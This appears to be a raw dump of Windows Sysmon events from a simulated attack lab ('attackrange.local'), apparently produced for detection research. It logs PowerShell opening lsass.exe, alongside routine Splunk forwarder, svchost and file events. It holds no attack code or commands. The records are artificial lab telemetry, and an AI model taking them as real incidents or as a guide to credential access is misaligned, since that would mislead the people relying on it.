07:57:28.460{466BC892-02AD-60E8-0B00-00000000CF01}624800C:\Windows\system32\lsass.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.339{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A8BFF5AA4C89B9CDC54D2BAF29392A09,SHA256=6682B720B2E235571AD8C63B2335F162A6AF0522637799BE37EA435035145359,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.338{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7ED54AAA39EC62AEA3ECFFB92AF7C1E3,SHA256=B86B6F59F4CB0C2EBAEB131659986587B714FA17282D47C07C6A6CA0DA06BE7E,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001051095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:57:28.286{466BC892-F5E6-60EB-817D-00000000CF01}8472\PSHost.132705502467981713.8472.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001051094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.255{466BC892-F5E6-60EB-817D-00000000CF01}8472ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_cajg4fsn.xj0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.254{466BC892-F5E6-60EB-817D-00000000CF01}8472ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_wmucxxbg.whb.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.065{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_wmucxxbg.whb.ps12021-07-12 07:57:28.065 10341000x80000000000000001051091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:28.044{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.400{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F5E8-60EB-9C79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F5E8-60EB-9C79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.384{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F5E8-60EB-9C79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.385{0C1E0330-F5E8-60EB-9C79-00000000D001}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:28.041{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BE1483C21984D3C757BC17CECAC527B4,SHA256=13045A6EC6783999944B48161D755F045236A9B8559ECB997DA8C9F48FDCB7D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:29.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D9568DAA0F16D3EAB457928956F7986,SHA256=3F19CDEAE38C05AAF945808CC7A0F2FD743E931EE0CDE4E56672D0CF6C763E72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:29.619{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15ED40D8446262D509D78E479070F9C2,SHA256=4176F56C52FF247569E388692B71865FB7967882DE40D71D2999FB36548C8716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:29.541{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58F759C74E7E1A094FF8D6609CDC60F6,SHA256=67F937A3F84174A362B94A1596DE561640B9CB2097EEF65EFA4B8931E886AA2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:29.055{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ABE9E0CAA6C1EA4C940E26CA1DA6D832,SHA256=4B5AE25A4369DBD83241BEAB4F76C7D39BE3A6F5146E8FDCF8D798C5ED783491,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:30.955{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D5A8BCA8FA9BEA6B1480B2F647CB223,SHA256=975E8C64C3B5D3BE4A264B3CE3912DA2A1DFB1C67C2B12A6DAFE8E93E415B1F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:30.556{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26327A7926ACBC9669424835236596BE,SHA256=2A3DB332427C2D6E5FFA228AA37B33FACDFCAC8F6F107AAF25EB681703CF91D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051103Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:20.772{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51099-false10.0.1.12-8000- 23542300x8000000000000000808558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:30.134{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=D5606BEC98489357046B4286F7411012,SHA256=041D709EA095618CCF7AF1EB6C88E4D47EB2FDBC5A156A18A82EDDB7CDD452E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:31.603{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CB4C646516C8B2E3C1E5FA982F81ED2,SHA256=087F19D4BAD83270A2BC9EC06499E52E442E9689945668099FD7019668468C40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.969{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.967{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.966{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.950{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:31.948{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781